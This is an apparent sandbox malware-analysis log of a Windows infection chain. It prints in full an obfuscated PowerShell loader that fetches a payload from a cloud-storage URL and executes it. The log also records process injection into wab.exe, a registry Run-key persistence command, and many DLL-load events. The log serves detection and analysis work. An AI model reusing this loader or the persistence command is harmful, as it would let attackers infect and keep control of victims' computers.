delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Saltspoonful.Dag && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Saltspoonful.Dag && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%gam% -w 1 $Putrilaginously=(Get-ItemProperty -Path 'HKCU:\predetrimental\').Bingoer;%gam% ($Putrilaginously)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%gam% -w 1 $Putrilaginously=(Get-ItemProperty -Path 'HKCU:\predetrimental\').Bingoer;%gam% ($Putrilaginously)"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe "C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe "C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Saltspoonful.Dag && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet (Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfightlKlokkiTheomtBom,e(Bowpo$Exp.lk ladfaEmanatph not P toeSvngnl,araneHackemGibbim,andieRai ls cere)Wrath ');$Rugemaskine=$Leaner[0];Uudviklet (Blomraadne ' Trof$ PringScrewl etouoAmidobfi.eraBlgfrlTaste: lanhshrineCanonnSupersmetapiEskaddPostidPlagieR,klarRke,a=S.mmeN AucdeH.drowVagts-MervrO FilibV,rmojPejlke usikc Ins,tSepar SkyttSPhytoySldehsFasantBreake Staam udls. Su iNIs pae udaet Mahd.juncoW B steUnendb,utotC gla lIndkoiMisadeDagdrnCountt Cul. ');Uudviklet (Blomraadne ' mari$FejlbhArbejeDiffen.uppesRegnei PassdFlatmdPip.ieLunker Cyli. ,nf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Saltspoonful.Dag && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%gam% -w 1 $Putrilaginously=(Get-ItemProperty -Path 'HKCU:\predetrimental\').Bingoer;%gam% ($Putrilaginously)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%gam% -w 1 $Putrilaginously=(Get-ItemProperty -Path 'HKCU:\predetrimental\').Bingoer;%gam% ($Putrilaginously)"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: esscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
